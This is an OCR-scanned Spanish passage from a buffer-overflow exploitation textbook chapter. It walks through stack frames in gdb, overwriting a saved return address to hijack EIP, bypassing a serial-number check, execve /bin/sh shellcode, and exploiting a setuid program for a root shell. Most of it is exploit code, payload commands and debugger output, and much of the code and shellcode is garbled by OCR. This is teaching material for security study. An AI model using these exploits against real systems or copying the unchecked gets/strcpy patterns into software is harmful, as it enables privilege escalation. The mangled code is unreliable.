EBX. El stack ahora tendrá la apariencia mostrada en la figura 2-2. 

Como puede haber supuesto ya, la instrucción POP sólo cambia el valor de ESP no 
escribe ni borra los datos del stack. Más bien, POP escribe datos al operando, 


en este caso lo primero que se escribirá en EAX será la dirección de la variable VAR y 
luego el valor 1 a EBX. 


Address | Value 


643410h | Address of variable VAR 


643414h | 1 


643418h | *— ESP points to this address 


Figura 2-2: sacar valores del stack 


Otro registro pertinente al stack es EBP. El registro EBP es normalmente usado 
para calcular una dirección relativa a otra dirección, a veces llamada fra me pointer 
(estructura puntero). Aunque puede ser usado como un registro de propósito general, 
EBP siempre ha sido usado para trabajar con el stack. Por ejemplo, la siguiente 
instrucción utiliza EBP como un índice: 


mov eax,[ebp+10h] 


Esta instrucción moverá un dword, 16 bytes (10 en hexa) hacia abajo del stack 
(recuerde, la pila crece hacia abajo ), a EAX. 


Lasfunciones y el stack 


El propósito principal del stack es hacer el uso de las funciones más eficiente. Desde 
una perspectiva de bajo nivel, una función altera el flujo de control de un programa, 

de modo que una instrucción o grupo de instrucciones se puedan ejecutar 
independientemente del resto de programa. Más importante aún, cuando una función ha 
completado la ejecución de sus instrucciones, el stack retorna el control al llamador 
original de la función. Este concepto de las funciones se pone en práctica más 
eficientemente con el uso del stack. 

Eche una mirada a una función simple en C y cómo el stack es usado por la función: 


void function(int a, int b) 


( 
) 


main() 


( 


int array[5]; 


function(1,2); 
printf(“This is where the return address points”); 


En este ejemplo, las instrucciones en Main son ejecutadas hasta que es encontrada una 
llamada a una función. La ejecución consecutiva del programa ahora necesita ser 
interrumpida y se necesitan ejecutar las instrucciones de function. El primer paso es 
pasar los argumentos a function, a y b, hacia atrás en el stack. Cuando los argumentos 
son situados en el stack, la función es llamada, colocando la dirección de retorno, o 
RET, en el stack. RET es la dirección almacenada en el puntero de instrucción (ElP) al 
mismo tiempo que es llamado function. RET es la ubicación en la cual continuará la 
ejecución cuando se haya completado la función, así el resto del programa se podrá 
ejecutar. En este ejemplo, la dirección de printf ( “Thisis where the return address 
points”); será pasada al stack. 

El prologo se ejecuta, antes de que cualquier instrucción de function se pueda ejecutar. 
Resumiendo, el prologo almacena ciertos valores en el stack de modo que la función 
pueda ejecutarse limpiamente. El valor actual de EBP es pasado al stack, ya que el 
valor de EBP debe cambiarse a fin de referenciar los valores en el stack. Cuando 

la función se ha completado, necesitaremos ese valor almacenado en EBP a fin de 
calcular las localizaciones de dirección en main. Una vez EBP es guardado en el stack, 
ya podemos copiar el actual puntero de stack (ESP) en EBP. Ahora podemos referenciar 
fácilmente las direcciones locales en el stack. 

Lo último que hace el prologo es calcular el espacio de direcciones requerido para 

las variables locales de function y reservar este espacio en el stack. Substraer 

el tamaño de las variables de ESP reservando el espacio requerido. Finalmente, las 
variables locales de function, en este caso simplemente array, es empujado al stack. 
La figura 2-3 representa cómo se ve el stack en este punto. 


Low Memory Addresses and Top of the Stack 


High Memory Addresses and Bottom of the Stack 


Figura 2-3: Representación visual del stack después de llamar a una función. 


Ahora debe de tener una buena comprensión de cómo una función trabaja con el stack. 
Hemos conseguido profundizar un poco más y hemos visto lo que ocurre desde una 
perspectiva de ensamblado. Compile nuestra función simple en C de la siguiente forma: 


shellcoders Odebian:-/chapter_2$ cc -mpreferred-stack-boundary=2 -ggdb 
function.c - o function 


Asegurese de tener —ggdb de manera que la compilación obtenida sea para propósitos de 
depuración. También utilizaremos el conmutador de límite de stack, que prepare nuestro 
stack con incrementos de tamaño de dword. Si no es así, gcc optimizará el stack y nos 
dificultará nuestro trabajo en este punto. Cargue sus resultados en gdb: 


shellcoders Odebian:-/chapter_2$ gdb function 
GNU gdb 6.3-debian 


Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you 
are 

welcome to change it and/or distribute copies of it under certain 

conditions. 

Type “show copying” to see the conditions. 

There is absolutely no warranty for GDB. Type “show warranty” for 
details. 

This GDB was configured as “1386-linux”...Using host libthread_db 

library “/lib/libthread_db.so.1”. 


(gdb) 
En primer lugar, vea cómo la función, function, es llamada. Desensamblado de main: 


(gdb) disas main 

Dump of assembler code for function main: 
0x0804838c <main+0>: push %Zebp 

0x0804838d <main+1>: mov  %esp,%ebp 
0x0804838f <main+3>: sub  $0x8,%esp 
0x08048392 <main+6>: movl $0x2,0x4(%esp) 
0x0804839a <main+14>: movil $0x1,(%esp) 
0x080483a1 <main+21>: call 0x8048384 <function> 
0x080483a6 <main+26>: movl $0x8048500,(%esp) 
0x080483ad <main+33>: call 0x80482b0 <_init+56> 
0x080483b2 <main+38>: leave 

0x080483b3 <main+39>: ret 

End of assembler dump. 


En <main+6> y <main+14>, vemos que los valores de nuestros dos parámetros 
(0x1 y 0x2 ) son empujados en el stack hacia atrás. En <main+21>, vemos la 
instrucción de llamada que, aunque ello no es mostrado, empuja el RET (EIP) 

en el stack. Entonces Call transfiere el flujo de ejecución a function, en la dirección 
0x8048384. Ahora, desensamblamos function y veamos lo que sucede cuando el 
control es transferido allí: 


(gdb) disas function 

Dump of assembler code for function function: 
0x08048384 <function+0>: push %Zebp 
0x08048385 <function+1>: mov  %esp,%ebp 


0x08048387 <function+3>: sub  $0x20,%esp 
0x0804838a <function+6>: leave 
0x0804838b <function+7>: ret 

End of assembler dump. 


Mientras que la función no prepare la variable local, array, la vista del desensamblado 
es relativamente simple. Esencialmente, todo lo que vemos es el prologo de la función y 
el retorno del control control a main. El prologo primero almacena la actual estructura 
de puntero, EBP, en el stack. Luego copia el actual puntero al stack a EBP en 


<unction+1> Finalmente, el prologo crea el espacio suficiente en el stack para nuestra 
variable local, array, en Function+3> “array” tiene un tamaño de 5 * 4 bytes (20 
bytes), pero el stack reserva 0x20 o 30 bytes de espacio en el stack para nuestras 
variables locales. 


Desbordar buffersen el stack 

Ahora que tenemos una sólida comprensión de lo que sucede cuando una función es 
llamada y cómo interactiva con el stack. En esta sección, vamos a ver 

lo que sucede cuando pasamos demasiados datos a un buffer. Una vez que hayamos 
comprendido lo que sucede cuando se desborda un buffer, podremos avanzar hacia 
materia más divertida, es decir explotando un “buffer overflow” y tomar el control de 
ejecución. 

Creemos una función simple que lee la entrada de usuario en un buffer, y luego da la 
salida de la entrada de usuario a stdout: 


void return_input (void) 
[ 
char array[30]; 
gets (array); 
printi(“%sin”, array); 
) 
main() 
[ 
return_input(); 
return 0; 


) 


Esta función permite al usuario poner cuantos elementos quiera en array. Compile este 
programa, de nuevo usando el límite de stack preferido 


shellcoders Odebian:-/chapter_2$ cc -- mpreferred-stack-boundary=2 -- gedb 
overflow.c - o overflow 


Ejecutemos el programa y luego entre datos para sobrepasar el buffer. 
Para la primera ejecución, simplemente entre diez caracteres A: 


shellcoders Odebian:-/chapter_2$./overflow 
AAAAAAAAAA 
AAAAAAAAAA 


Nuestra función simple retorna lo que ha sido entrado, y todo funciona bien. 
Ahora, pongamos 40 caracteres, lo cual desbordará el buffer y empezará a escribir 
encima de otras cosas almacenadas en el stack: 


shellcoders Odebian:-/chapter_2$./overflow 
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCODDDDDDDDD 
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCODDDDDDDDD 
Segmentation fault ( core dumped ) 


¿Conseguimos un segfault como esperábamos, pero por qué? hagamos una mirada en 
profundidad, usando GDB. 
En primer lugar, ejecutemos GDB: 


shellcoders Odebian:-/chapter_2$ gdb ./overflow 


Demos una mirada a la función return_input () . Pongamos un punto de ruptura en la 
llamada a gets() y en el punto donde retorna: 


(gdb) disas return_input 
Dump of assembler code for function return_input: 


0x080483c4 <return_input+0>: 
0x080483c5 <return_input+1>: 
0x080483c7 <return_input+3>: 
0x080483ca <return_input+6>: 
0x080483cd <return_input+9>: 


0x080483d0 <return_input+12>: 
0x080483d5 <return_input+17>: 
0x080483d8 <return_input+20>: 
0x080483dc <return_input+24>: 
0x080483e3 <return_input+31>: 
0x080483e8 <return_input+36>: 
0x080483€e9 <return_input+37>: 


push %Zebp 

mov  %esp,%ebp 

sub  $0x28,%esp 

lea  Oxffffffe0(Jebp), oeax 
mov  %Zeax,(%esp) 

call 0x80482c4 <_init+40> 
lea  Oxffffffe0(FPebp), %eax 
mov  %eax,0x4(%esp) 
movl $0x8048514,(%esp) 
call 0x80482e4 <_init+72> 
leave 

ret 


End of assembler dump. 


Podemos ver las dos instrucciones “call” , para gets () y printf (). Podemos también 
ver la instrucción “ret” al final de la función, así que pongamos puntos de ruptura en 
la llamada a gets () y el “ret”: 


(gdb) break *0x080483d0 
Breakpoint 1 at 0x80483d0: file overflow.c, line 5. 
(gdb) break *0x080483e9 
Breakpoint 2 at 0x80483e9: file overflow.c, line 7. 


Ahora, ejecutemos el programa, hasta nuestro primer punto de ruptura: 


(gdb) run 
Breakpoint 1, 0x080483d0 in return_input () at overflow.c:3 
gets (array); 


Vamos a echar una mirada al stack como se ve, pero primero, echemos una mirada al 
código de la función main (): 


(gdb) disas main 
Dump of assembler code for function main: 


0x080483ea <main+0>: push %ebp 

0x080483eb <main+1>: mov  %Zesp,%ebp 

0x080483ed <main+3>: call 0x80483c4 <return_input> 
0x080483f2 <main+8>: mov  $0x0,%eax 


0x080483f7 <main+13>: pop %ebp 
0x080483f8 <main+14>: 
End of assembler dump. 


ret 


Observe que la instrucción después la llamada a return_input () está en la dirección 
0x080483f2. Echemos una mirada al stack. Recuerde, este es el estado del stack antes 
de gets() que ha sido llamado en return_input (): 


(gdb) x/20x $esp 


Oxbffffa98: 
OxbffffaaS: 
Oxbffffab8: 
Oxbffffacg8: 
Oxbffffad8: 


OxbffffaaO 
Oxbffffac8 
Oxbffffb24 
Oxbffffaf8 
Oxbffffb2c 


0x080482b1 
0x0804841b 
0x4014a8c0 
0x40030e36 
0x08048300 


0x40017074 
0x4014a8c0 
Oxbffffac8 
0x00000001 
0x00000000 


0x40017af0 
0x08048460 
0x080483f2 
Oxbffffb24 
0x4000bcd0 


Recuerde que estamos esperando ver el guardado de EBP y el guardado de la dirección 
de retorno (RET). La vemos en negrita en el volcado anterior. Podemos ver que la 
dirección de retorno guardada está apuntando a 0x080483f2, la dirección en main () 
después de la llamada a return_input (), que es lo que esperábamos. Ahora, 
continuemos la ejecución del programa y entremos una string de 40 caracteres: 


(gdb) continúe 


Continuimg. 


AAAAAAAAAABBBBBBBBBBCCEECCECCCCCODDDDDDDDD 
AAAAAAAAAABBBBBBBBBBCCECCECCCCCODDDDDDDDD 


Breakpoint 2, 0x080483€e9 in return_input () at overflow.c:7 


To) 


Una vez parados en el segundo punto de ruptura, en “ret”, en return_input(), 
justo antes de los resultados de la función. Echamos una mirada a la pila ahora: 


(gdb) x/20x Oxbffffa98 


Oxbffffa98: 
Oxbffffaas: 
Oxbffffabs8: 
Oxbffffac8: 
Oxbffffad8: 


0x08048514 
0x42424141 
0x43434343 
Oxbffffa00 
Oxbffffb2c 


OxbffffaaO 

0x42424242 
0x44444343 
0x40030e36 
0x08048300 


0x41414141 
0x42424242 
0x44444444 
0x00000001 
0x00000000 


0x41414141 
0x43434343 
0x44444444 
Oxbffffb24 
0x4000bcd0 


De nuevo, en negrita el guardado de EBP y el guardado de la dirección de retorno; 
observe que ambas han sido sobrescritas con caracteres de nuestra string—0x44444444 
el equivalente en hex de “DDDD”. Veamos lo que sucede cuando ejecutamos la 
instrucción “ret”: 


(gdb) x/1i Seip 
0x80483€e9 <return_input+37>: ret 


(gdb) stepi 


0x44444444 in 9? () 


(gdb) 


Hey ! Repentinamente estamos ejecutando código en una dirección que está 
especificada en nuestra string. Eche una mirada en figura 2-4 , la cual muestra cómo se 
ve el stack después de que sea desbordado array. 


Low Memory Addresses and 
Top of the Stack 


AAAAAAAAAABEBEBEBEBECOCECOCeCCon | Aray (30 characters + 2 characters 
of padding) 


DDDD EBP 

DDDD RET 
High Memory Addresses and 
Bottom ol the Stack 


Figura 2-4: Resultado de desbordar array sobrescribiendo otros elementos en el stack. 


Llenamos array con 32 bytes y luego lo ponemos en uso. Escribimos lo guardado en la 
dirección de EBP, el cual es ahora un dword conteniendo la representación hexadecimal 
de DDDD. Lo más importante, escribimos sobre RET con otro dword de DDDD. 
Cuando la función sale, leemos el valor almacenado en RET, que es ahora 

0x44444444 , el equivalente hexadecimal de DDDD, e intentamos saltar a esta 
dirección. Esta dirección no es una dirección válida, o está en un espacio de dirección 
protegida, y el programa termina con un fallo de segmentación. 


Controlando ElP 


Hemos desbordado ahora con buen resultado un buffer, sobrescribiendo EBP y RET y 
por lo tanto ha causado que nuestro valor desbordado sea cargado en EIP. Todo esto 
tiene como consecuencia que rompa el programa. Este overflow puede utilizarse para 
finalizar un servicio, el programa que se cierra tendría que ser muy importante para que 
a alguien le pudiera preocupar. No es nuestro caso. Así, pues intentemos controlar el 
flujo de ejecución, o básicamente, controlar lo que está cargado en EIP, el puntero de 
instrucción. 

En esta sección, tomaremos el ejemplo de overflow anterior y en lugar de llenar el 
buffer con “Des”, lo llenaremos con la dirección que nosotros escojamos. La dirección 
será escrita en el buffer y sobrescribirá EBP y RET con nuestro nuevo valor. Cuando 
RET sea leído fuera de la pila y pasado a EIP, la instrucción de la dirección se ejecutará. 
Y si esto se produce controlaremos la ejecución. 

En primer lugar, necesitamos decidir que dirección utilizaremos. Tomaremos la llamada 
del programa a return_input en lugar de retornar el control a main. Necesitamos 
determinar la dirección para saltar por encima de ella, para lo cual tendremos que ir de 
vuelta a gOb y descubrir en que dirección se realiza la llamada a return_input : 


shellcoders Odebian:-/chapter_2$ gdb ./overflow 

(gdb) disas main 

Dump of assembler code for function main: 

0x080483ea <main+0>: push %ebp 

0x080483eb <main+1>: mov  %esp,%ebp 

0x080483ed <main+3>: call 0x80483c4 <return_input> 
0x080483f2 <main+8>: mov  $0x0,%eax 


0x080483f7 <main+13>: pop %ebp 
0x080483f8 <main+14>: ret 
End of assembler dump. 


Vemos que la dirección que queremos utilizar es 0x080483ed. 


OBSERVACION: normalmente no tendrán exactamente las mismas direcciones, con lo 
cual hay que verificar que ha encontrado la dirección correcta para return_input. 


Desde 0x080483ed no podemos introducir caracteres ASCII normales, necesitamos 
encontrar un método para volver a esta dirección pudiendo realizar entrada de 
carácteres. Podemos entonces tomar los datos de salida de este programa y dirijirlos al 
buffer desbordándolo. Para realizarlo podemos utilizar la función de shell printf y 
canalizamos la salida de printf para desbordar el programa. Probemos primero con una 
string corta: 


shellcoders Odebian:-/chapter_2$ printf 
“AAAAAAAAAABBBBBBBBBBCCCCCCCCCC”] ./overflow 
AAAAAAAAAABBBBBBBBBBCCECCECCCCCC 

shellcoders Odebian:-/chapter_2$ 


...aquí no existe desbordamiento y conseguimos que nuestra string sea repetida una vez. 
Si sobrescribimos el guardado de la dirección de retorno con nuestra dirección, 
sustituyendo a la de la llamada a return_input (): 


shellcoders Odebian:-/chapter_2$ printf 
“AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDD xedix83x04x08” | 
.Joverflow 

AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDí 
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDO 


Observamos que retornó nuestra string dos veces. Con lo cual conseguimos con buen 
resultado que el programa se ejecute en la ubicación de nuestra elección. ¡Felicidades, 
ha explotado con buen resultado su primera vulnerabilidad! 


Una interesante diversión 


Aunque la mayor parte de este libro se enfoca en ejecutar el código de su elección 
dentro del programa objeto, a veces no existe ninguna necesidad para hacer esto. A 
menudo para realizar un ataque puede ser suficiente redireccionar la ruta de ejecución a 
una parte distinta del programa objeto, como vimos en los ejemplos previos — no es 
necesario querer en el shell root un “socket-stealing” buscando los privilegios 
superiores en el programa objeto. Un gran número de los mecanismos de defensa están 
enfocados en impedir la ejecución de código “arbitrariamente”. Muchas de estas 
defensas (como ejemplo, NX, Windows DEP) es hacer inútil que los atacantes puedan 
simplemente volver a usar la parte del programa objeto para lograr su objetivo. 


Imagine un programa que requiere un número de serie para entrar antes de que se pueda 
usar. Imagine que este programa tiene un stack overflow cuando el usuario entra un 
número de serie demasiado largo. Podemos crear un “serial”que siempre sea válido 
haciendo que el programa salte a la sección del código “valido” después de que un 
número de serie correcto haya sido entrado. Este “exploit” sigue exactamente la técnica 
de la sección anterior, pero ilustra algunas situaciones reales ( particularmente la de 
autentificación ) simplemente saltando por encima de una dirección elegida por el 
atacante podría ser suficiente. 

Aquí está el programa: 


// serial.c 


Hinclude <stdlib.h> 
Hinclude <stdio.h> 
ftinclude <string.h> 


int valid_serial( char *psz ) 

( 
size_t len = strlen( psz ); 
unsigned total = 0; 
size tl; 

if( len< 10) 
return 0; 


for(1= 0; 1< len; i++) 
( 
if(Cpsz[i] < 0”) || Cpsz[i] > *z? )) 
return 0; 
total += psz[1]; 


) 

1f( total % 853 == 83 ) 
return 1; 

return 0; 


) 


int validate_serial() 
( 
Char serial[ 24 ]; 
fscant( stdin, “Jos”, serial ); 
1£( valid_serial( serial )) 
return 1; 
else 
return 0; 


) 


int do_valid_stuff() 

( 
printf(“The serial number is valid”); 
// el serial valido se restringe aquí. 
exit( 0 ); 


int do_invalid_stuff() 

( 
printf(“Invalid serial nambernExitingin”); 
exit( 1 ); 

) 


int main( int argc, char *argv[] ) 
( 
1£( validate_serial() ) 
do_valid_stuff(); // 0x0804863c 
else 
do_invalid_stuff(); 
return 0; 
) 
Si compilamos, vinculamos y ejecutamos el programa, podemos ver que acepta seriales 
como entrada y (si el número de serie es de más de 24 caracteres de longitud) desborda 
de una forma similar al programa anterior. 
Si ejecutamos gdb, podemos saber si el código del serial es válido: 


shellcoders Odebian:-/chapter_2$ gdb ./serial 
(gdb) disas main 
Dump of assembler code for function main: 


0x0804857a <main+0>: push %ebp 
0x0804857b <main+1>: mov  %esp,%ebp 
0x0804857d <main+3>: sub $0x8,%esp 
0x08048580 <main+6>: and  SOXfffffff0,%esp 


0x08048583 <main+9>: 


0x08048588 <main+14>: 
0x0804858a <main+16>: 
0x0804858f <main+21>: 
0x08048591 <main+23>: 
0x08048593 <main+25>: 
0x08048598 <main+30>: 
0x0804859a <main+32>: 


mov  $0x0,%eax 

sub Jeax,%esp 

call 0x80484f8 <validate_serial> 
test Veax,%eax 

je  0x804859a <main+32> 

call 0x804853e <do_valid_stuff> 
jmp  0x804859f <main+37> 

call 0x804855c <do_invalid_stuff> 


0x0804859f <main+37>: mov  $0x0,%eax 
0x080485a4 <main+42>: leave 
0x080485a5 <main+43>: ret 


Aquí podemos ver la llamada a validate_serial y la verificación subsecuente, y la 
llamada de do_valid_stuffo do_invalid_stuff. Si desbordamos el buffer y colocamos 
el guardado de la dirección de retorno a 0x08048593 , seremos capaces de desviar la 
verificación del número de serial. 

Para hacer esto, use la característica de volver a realizar printf (recuerde que el orden 
de los bytes es inverso porque las máquinas 1A32 son “little-endian” ). Cuando 
ejecutamos nuestro serial con nuestro número de serie especialmente escogido como 


entrada, conseguimos: 


shellcoders Odebian:-/chapter_2$ printf 
“AAAAAAAAAABBBBBBBBBBCCECCCCCCAAAABBBBCCECCDODDODAx931x851x 
04x08” | 

/serial 

The serial Number is valid ! 


A propósito, el número de serie “HHHHHHHHHHHHH” (13 H) también funcionaría ( 
pero por este camino era mucho más divertido ). 


Utilizar un exploit para conseguir los privilegios de “root” 


Ahora es el momento de hacer algo útil con la vulnerabilidad explotada anteriormente. 
Forzamos overflow.c para que pregunte por la entrada dos veces en lugar de una vez, es 
un truco limpio, pero que dirían sus amigos al respecto—“Eh, suponga lo que causará 
un programa en C de 15 líneas que pregunte por la entrada dos veces !” No, queremos 
que pierda el interés sobre ello.. 


Este tipo de desbordamiento es normalmente utilizado para tomar los privilegios de root 
(uid O ). Podemos hacer esto atacando un proceso que esté corriendo como root.. Lo 
fuerzas a execre, una shell que hereda sus permisos. Si el proceso está corriendo como 
root, tendrá una shell root. Este tipo de desbordamiento local es cada vez más popular 
porque más y más programas no corren como root—después son explotados, se 

debe usar a menudo un segundo desbordamiento para conseguir el acceso a nivel root. 
Depositar una shell root no es la única cosa que podemos hacer al explotar una 
vulnerabilidad de un programa. En capítulos siguientes de este libro se enseñan métodos 
de explotación además de colocar una shell root. Basta decir, que una shell root es una 
de las más comunes explotaciones y la más fácil de comprender. 

Tenga cuidado, sin embargo. El código para colocar una shell root hace uso de la 
llamada de sistema execve. Lo que sigue es un programa en C para colocar una shell: 


// shell.c 
int main() f 
char *name[2]; 


name[0] = “/bin/sh”; 
name[1] = 0x0; 
execve(name[0], name, 0x0); 
exit(0); 

) 


Si compilamos este código y lo ejecutamos, podemos ver que colocará una shell para 
nosotros. 


[jack OOday local]$ gcc shell.c -o shell 
[jack EOday local]$ ./shell 
sh-2.05b+ 


Puedes pensar, esto es excelente, ¿Ahora cómo puedo inyectar código fuente C en el 
área vulnerable? ¿Puedo realizarlo de la misma forma que lo hicimos previamente con 
los caracteres A? La respuesta no es esta. Inyectar código fuente C es mucho más difícil 


que realizar eso. Tendremos que inyectar instrucciones máquina reales, o opcodes , en 
el área de entrada vulnerable. Lo haremos así, debemos convertir nuestro código de la 
shell a ensamblador, y entonces extraer los opcodes en ensamblador para que sean 
legibles por los humanos. Tendremos entonces lo que se llama shellcode , o los opcodes 
que se pueden inyectar en un área de entrada vulnerable y ejecutarlos. Esto es un 
proceso largo y complicado, y hemos dedicado varios capítulos en este libro sobre ello. 
No detallaremos extensivamente cómo se crea un shellcode en código C; es un proceso 
bastante complicado y se explica completamente en el capítulo 3. 

Realicemos una mirada a la representación del shellcode, de la colocación del shell en 
código C ejecutada previamente: 


Axeblxlalx5elx3 1xc0x881x461x0NAx8dAUx le ix8NMxSe1xO81x8 901x467” 
AXOAXbOxODIx8BMXEBAX8AAxACAxOSAX BAS OO Ax CABO xe 8 xe 1? 
AXEAxEAxfAx2Ax6OAx6Nx6eAx2 Nx 731x68”; 


lo probamos para asegurarnos que realiza lo mismo que el código C. Compilando el 
siguiente código, debe permitirnos ejecutar el shellcode: 


1/ shellcode.c 
char shellcode[] = 
“Axeblx1alxSe1x3 IxcOx881x460xOTAX8B AN 1x8 AxO8BAX EN 6” 
“AXOAXDOMXODIBAX EAS ANACO ABAD O Ax CABO xe 8x1” 
“AXEAxEAxfAx2ZAXOA6Nx6eAx2NX TB AX Ó6 8”; 


int main() 


( 


int *ret; 
ret = (int *)4zret + 2; 
(ret) = (int)shellcode; 


) 


Ahora ejecute el programa: 


[jack EOday local]$ gcc shellcode.c -o shellcode 
[jack EOday local]$ ./shellcode 
sh-2.05b+ 


Bien, excelente, tenemos colocado el shellcode con lo cual podemos inyectar código a 
un buffer vulnerable. Esa era la parte fácil. Ahora para que nuestro shellcode sea 
ejecutado, debemos tomar el control de la ejecución. Utilizaremos una estrategia similar 
a lo hecho en el ejemplo previo, donde forzamos a una aplicación para que pregunte por 
la entrada una segunda vez. Sobrescribiremos RET con nuestra dirección escogida, 
causando que la dirección que suministramos sea cargada en ElP y posteriormente 
ejecutada. ¿Qué dirección usaremos para sobrescribir RET? Bien, la sobrescribiremos 
con la dirección de la primera instrucción de nuestro shellcode inyectado. De este modo, 
cuando RET sea sacado de la pila y cargado en EIP, la primera instrucción que se 
ejecutará es la primera instrucción de nuestro shellcode. 

Aunque todo este proceso puede parecer simple, es en realidad bastante difícil 
ejecutarlo en la vida real. Esto da lugar a que la mayoría de aprendices de hack no les 


funcione la primera vez, con lo cual se frustran y se dan por vencidos. Examinaremos 
algunos de los problemas más difíciles y esperemos que no nos coja la frustración. 


El problema de la dirección 


Una de las más difíciles tareas al tratar de ejecutar la shellcode suministrada por el 
usuario está, en identificar la dirección para empezar su shellcode. A través de los años, 
se han inventado muchos métodos distintos para resolver este problema. Explicaremos 
el método más popular enseñado en los “papers”, “Smashing the Stack.” (Deshaciendo 
la pila). 


Una forma para hallar la dirección de nuestro shellcode es suponer donde está colocado 
en memoria el shellcode. Podemos hacer una suposición bastante adecuada, porque 
sabemos que para cualquier programa, la pila empieza con la misma dirección. ( La 
mayoría de los sistemas operativos nuevos varían la dirección de la pila 
deliberadamente para hacer que este tipo de ataque sea más dificil. En la mayor parte de 
las versiones de Linux esto es un parche opcional del kernel.) Si sabemos que dirección 
es, podemos intentar suponer cuán lejos de esta dirección de inicio está nuestro 
shellcode. 

Es bastante fácil realizar un simple programa para que nos diga la ubicación en la pila 
del puntero (ESP). Una vez que sabemos la dirección de ESP, simplemente necesitamos 
suponer la distancia, o offset, de esta dirección. El offset será la primera instrucción en 
nuestro shellcode. 

En primer lugar, encontramos la dirección de ESP: 


// find_start.c 
unsigned long find_start(void) 


( 
) 
int main() 


( 
) 


__asm__(“movl %esp, %eax”); 


printf(“0x% xn”, find_start(); 


Si compilamos y ejecutamos este varlas veces, conseguimos: 


shellcoders Odebian:-/chapter_2$./find_start 
Oxbffffad8 
shellcoders Odebian:-/chapter_2$./find_start 
Oxbffffad8 
shellcoders Odebian:-/chapter_2$./find_start 
Oxbffffad8 
shellcoders Odebian:-/chapter_2$./find_start 
Oxbffffad8 


Este, ha sido ejecutado en Debian 3.1r4, así que se puede conseguir resultados distintos. 
Específicamente, si la dirección mostrada por el programa es diferente cada vez, 
significa probablemente que está ejecutando una distribución con el “grsecurity patch”, 
o algo similar. Si es el caso, los siguientes ejemplos serán difíciles de reproducir en su 


máquina, pero en el capítulo 14 se explica cómo adelantarse a este tipo de datos 
aleatorios. No obstante, asumiremos que está ejecutando una distribución que tiene una 
dirección única del puntero de pila. 

Ahora crearemos un pequeño programa para explotar: 


// victim.c 
int main(int argc,char *argv) 


( 
Char little_array[512]; 


if (arge > 1) 
strepy(little_array,argv[1]); 
) 


Este programa toma las ordenes entradas y las coloca en un array sin comprobación de 
límites. A fin de conseguir los privilegios root, debemos poner este programa para 
obtener el root, y habilitar el bit suid. Ahora, cuando entramos como un usuario normal 
(no root ) y explotemos el programa, tenemos que terminar con acceso root: 


[jack OOday local]$ sudo chown root victim 
[jack EOday local]$ sudo chmod +s victim 


Así pues, tenemos nuestro programa “victim”. Podemos poner el shellcode como 
argumento en la línea de orden del programa usando la orden printf otra vez..Así 
pasaremos un argumento en la línea de ordenes parecida a esta: 


victim <nuestro shellcode><algún relleno><nuestra dirección de retorno elegida> 


Lo primero que necesitamos hacer es calcular el Offset de la cadena, en la línea de 
órdenes que sobrescribe la dirección de retorno guardada. En este caso sabemos que esta 
estará a menos de 512 , pero generalmente tendrá que probar con varias longitudes de 
strings hasta que consiga la buena. 

Una observación sobre la segunda lectura y la orden de substitución—puede ocurrir que 
la salida de printf ponga en la línea de orden un parámetro con el signo $ delante de él y 
colocarlo entre paréntesis, así: 


/victim $ (printf “foo”) 
Podemos hacer la salida de printf como una larga cadenas de ceros así: 


shellcoders Odebian:-/chapter_2$ printf “*%020x” 
00000000000000000000 


Podemos utilizar esto para suponer fácilmente el offset de la dirección de retorno en el 
programa vulnerable: 


shellcoders Odebian:-/chapter_2$ ./victim $(printf “%0512x” 0) 
shellcoders Odebian:-/chapter_2$ ./victim $(printf “%0516x” 0) 
shellcoders Odebian:-/chapter_2$ ./victim $(printf “%0520x” 0) 


shellcoders Odebian:-/chapter_2$ ./victim $(printf “%0524x” 0) 
Segmentation fault 
shellcoders Odebian:-/chapter_2$ ./victim $(printf “%0528x” 0) 
Segmentation fault 


Así pues las longitudes con las que podamos conseguir fallas de segmentación en la 
dirección de retorno guardada están probablemente alrededor de 524 ó 528 bytes de 
longitud para nuestro argumento en la línea de órdenes. 

Tenemos el shellcode el cual queremos conseguir ejecutar en el programa, y sabemos 
con certeza donde será guardada la dirección de retorno, así que vamos a ello. 

Nuestro shellcode es de 40 bytes. Tenemos pues de 480 ó 484 bytes de relleno, con lo 
cual nuestra dirección de retorno guardada estará ahí. Pensemos que nuestra dirección 
de retorno guardada debe encontrarse un poco menos de Oxbffffad8. Probamos y vemos 
que la dirección de retorno guardada es. La línea de comandos aparece así: 


shellcoders Odebian:-/chapter_2$ ./victim S(printf 

“Axeblx1alxSeix3 AxcOx8S AGO NBA 1AXBN ID CAXOB BN AGRO CANDO NX O 
DIXxSMXEA8BAAACIxO8BUXB ADO OA XCANAX BO xe 8 Axe MEA EA TAx2 Nx 2ZAXxÓ 
x6ex2Ax731x68%0480x1xd8lxfalxffAxbf”) 


Observe que el shellcode está al principio de la string, seguido por 9%0480x y 

los cuatro bytes representando la dirección de retorno guardada. Si hemos atacado la 
dirección buena, este debe a empezar a ejecutar la pila. 

Cuando ejecutamos la línea de ordenes, conseguimos: 


Segmentation fault: 
Así que probemos cambiando el relleno a 484 bytes: 


shellcoders Odebian:-/chapter_2$ ./victim S(printf 

“Axeblx1alxSeix3 AxcOx8SAGO NBA LEARN CAXOB BN AGRO CANDO NX O 
DXx8SMXxEA8BAAxACixO8BUB ADO OA XxCANAX BO xe 8 Axe MEA EA AZNAR ZAXxÓ 
Nx6ex2Ax731x68%0484x1xd81xfalxffAxbf”) 

Illegal instruction 


Con este conseguimos una instrucción no válida con lo cual vemos claramente que 
hemos ejecutado algo distinto. Ahora probemos modificando la dirección de retorno 
guardada. Como sabemos que la pila crece hacia atrás en la memoria esto es, hacia 
direcciones inferiores, hay que esperar que la dirección de nuestro shellcode será 
inferior que Oxbffffads. 

Para ser breves, en el texto siguiente se muestra sólo lo pertinente, la salida en la línea 
de ordenes: 


870484x1x38xfaAxfAxbf”) 
Ahora, construiremos un programa que nos permita suponer el offset entre el principio 
de nuestro programa y la primera instrucción en nuestro shellcode. ( la idea para 


este ejemplo ha sido pedida prestada de Lamagra.) 


Hinclude <stdlib.h> 


ttdefine offset_size 0 

ttdefine buffer_size 512 

char sc[] = 
“Axeblx1alxSe1x3 IxcOx881x40xOTAX8B AN 1EAX8BMXDCAXxO8BAX EN 6” 
“AXOAXDOMXODIXBNAX EAS ANACO ABANDO AO Ax CAAXBO xe 8x1” 
